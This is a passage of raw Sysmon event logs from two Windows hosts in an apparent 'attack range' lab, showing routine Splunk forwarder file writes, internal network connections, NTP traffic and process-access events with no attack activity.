Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=00C37678A984115A5A9C5B34E6785429,SHA256=5ABCB98920FC13AE078C4C354BDAEA69D1FEAA7C52863F6FE04AAF1CE5E6EF8F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215854Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:46:07.444{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5CB81E989300A6084F70649FD43E5FF9,SHA256=808BA634BB579EA159FC47A8396BCD3231070E5B3F67709A4A0D3DFF56252D97,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000286915Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:46:04.905{C8EA50B7-F11F-6215-1200-000000003802}8C:\Windows\System32\svchost.exeNT AUTHORITY\LOCAL SERVICEudptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local123ntpfalse20.101.57.9-123ntp 23542300x8000000000000000286914Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:46:07.354{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8F3E980430251391C3B2F538FC1FA6A2,SHA256=F7F0D6D3496A355D171F796F1179F8D468ED936A9741D8D8F8BC877932DDF199,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000215853Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:46:04.705{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51284-false10.0.1.12-8000- 23542300x8000000000000000215855Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:46:08.554{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A3A25CCC389CF3AE08E857CF56848F94,SHA256=C013AF98772E00026824F4BB1BC6CC996D50F44A1A67E0DEACD766104329CA8A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286916Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:46:08.416{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=23F192E3492122B7C64BC057C1D6FB91,SHA256=29F604961231330BF76117CC505F74AE6C10D60D3358DA8148FECAA5D0E08B43,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215856Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:46:09.601{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6BCC620E11990FD89A02B5EE51ECFB19,SHA256=40620B61AD4C6029E5EE21F13365FECA9EB174CB4D6E387D047725A4A033D150,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000286919Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:46:06.577{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53371-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000286918Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:46:09.435{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0CFD8CB6EA6F8532E9CC854A0D06F3B8,SHA256=15ABF8F08A4E0D665CD440DECEFF7DA1BE5F8A0EDA259A60659A5D871454C8A2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286917Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:46:09.344{C8EA50B7-F130-6215-2F00-000000003802}2588NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-03cdc2690a17b3e8a\channels\health\respondent-20220223083251-129MD5=A38EB58E8C6680789F1AEA0022EC0210,SHA256=7B5C3F2ACD9B17C99423AC4BB2B0CFD455B3A71F8C48567BF2A051FF8E6D4921,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215857Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:46:10.616{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C92354D89AADE4B14F033B91B6BF1613,SHA256=41FA3FBC455FEE7E0DD6866639EDB38E483BC38E762535903FB18411D6C8CBC3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286921Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:46:10.542{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FD8FFDC01D31CE233BD051C92E4133D7,SHA256=875C544A676322700C314E3C26A5C2741D3BDB57D52A317EECC89B42781A7AFF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286920Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:46:10.342{C8EA50B7-F130-6215-2F00-000000003802}2588NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-03cdc2690a17b3e8a\channels\health\surveyor-20220223083249-130MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215858Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:46:11.851{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D8AE98734198D531874821553E27A1FE,SHA256=C87B5D73CEE3A47D8C9911FB2D2B7687B9FEEECDBF5E8A5C93902338E6B3BE8F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286922Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:46:11.639{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EB426868B89FDA7299B3B8385D3BFC65,SHA256=9C96BC9021820542F2EA322AC15C51D567BF8DDEB690500866634AD43B981EA8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215859Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:46:12.866{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=028B2BEA8E091514E7E939344A147354,SHA256=B0BF2D308D7B53246244E4D7AE3A65FEB65303D726E85725ACC8D579ADD0A2A2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286923Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:46:12.654{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3D9E8897BC649FC255F380B66B51AB10,SHA256=1DB460D9574DDCA573F2414428EC47D9FAF2353EBE39F535E345762385282414,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215860Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:46:13.882{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EEF8D26F227CFAFD5D04F34BB10DAD34,SHA256=53AC4D1786A2C9F6DACF9F48A868B7A2BC689E91063DAA3D6CA937F0C34409F8,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000286925Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:46:11.612{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53372-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000286924Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:46:13.655{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A33B56BB6FD9B6AD90E60494D2BAC313,SHA256=C8563D74FB5A610ABFBD3C35A70F2DDABE9CC00179A28317A7EF80132B3447FA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215862Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:46:14.898{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5F5B11DBD411678E60356E36FE1D49F4,SHA256=1697C1E0AEC1CC8238EDC54FC5C747536783080E7C236B0EB89EA73D09B87088,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286926Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:46:14.670{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=117DAFCCBBFA06692938760907824C01,SHA256=2281233404A97BE3EFB8CD755955F8344603077A1A23E04E356BA9E7A02F2F2F,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000215861Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:46:10.603{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51285-false10.0.1.12-8000- 23542300x8000000000000000215863Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:46:15.898{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AE529874396014567EAC0855C664CD13,SHA256=76CC2C98AF1D43ADE4691096262217D16FD2B360AEFB05007E64FEADC3E1D2B2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286927Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:46:15.717{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DB08ECDD388985435AD64F4A84E9199C,SHA256=351FE2E4922E16F7AACE32B7DB1FC043AB0737F3932778AA472BA4D53D515A37,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215864Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:46:16.913{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9A1A1C47DD6F17350C329D6C42A820A5,SHA256=D0E78E4904DA037BAA3C873CC21D8AC40EAA864B7142FDB5F8C74BABF8307AB1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286928Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:46:16.733{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=250D58B58A1F1AA78EC1A469590C6839,SHA256=6F78FC3BD7F0940665CFBA37B679C7905AA8242187AA9025720C16B3157516D0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215865Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:46:17.913{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7DC870E91F24D1A39BCCE3A64A9775A6,SHA256=6884E087DF7ECE86943251DADD2FB85C2AF6F3DCB440F0AED7BA27B5F8FD566F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286929Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:46:17.811{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DA01C2EDE4BFCCD8F49FB2B5B55A0CD4,SHA256=D510AEA8D1634D5C298DA34F39F0A67A960EE555BD4BE2CF3E059E61D47868BF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215867Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:46:18.913{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FAA7F60BDFD99BA354C0C90963092133,SHA256=9327366C27B39BDE0E6C86B35A4F6D0D9EAC0BD4F57311F6FC2975232A72C7CD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286930Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:46:18.826{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0A10CC8ED7619AECB7621349F8D8BBF3,SHA256=93393F4130D4AF73CF085682689ECABD035AE41E980A4D30D1CDAF983A38182E,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000215866Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:46:16.556{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51286-false10.0.1.12-8000- 23542300x8000000000000000215868Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:46:19.929{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E2F935B855C65B91975F25BD76E88AA9,SHA256=95B81C9415F2234C5C77656CA85644B4FC1531CFA32B734E0F65C2CB25A501CA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286941Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:46:19.967{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C462F127C4195EA443FD8F4686E35348,SHA256=FC6BD2B335E48763D6ED8ED214B75D652AF2E84A0CEB60B1E515C84D39CA774E,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000286940Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:46:17.628{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53373-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 10341000x8000000000000000286939Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:46:19.670{C8EA50B7-107B-6216-EC04-000000003802}4201584C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286938Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:46:19.467{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-107B-6216-EC04-000000003802}420C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286937Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:46:19.467{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286936Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:46:19.467{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286935Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:46:19.467{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286934Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:46:19.467{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286933Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:46:19.467{C8EA50B7-F11C-6215-0500-000000003802}412368C:\Windows\system32\csrss.exe{C8EA50B7-107B-6216-EC04-000000003802}420C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000286932Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:46:19.467{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-107B-6216-EC04-000000003802}420C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000286931Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:46:19.468{C8EA50B7-107B-6216-EC04-000000003802}420C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT 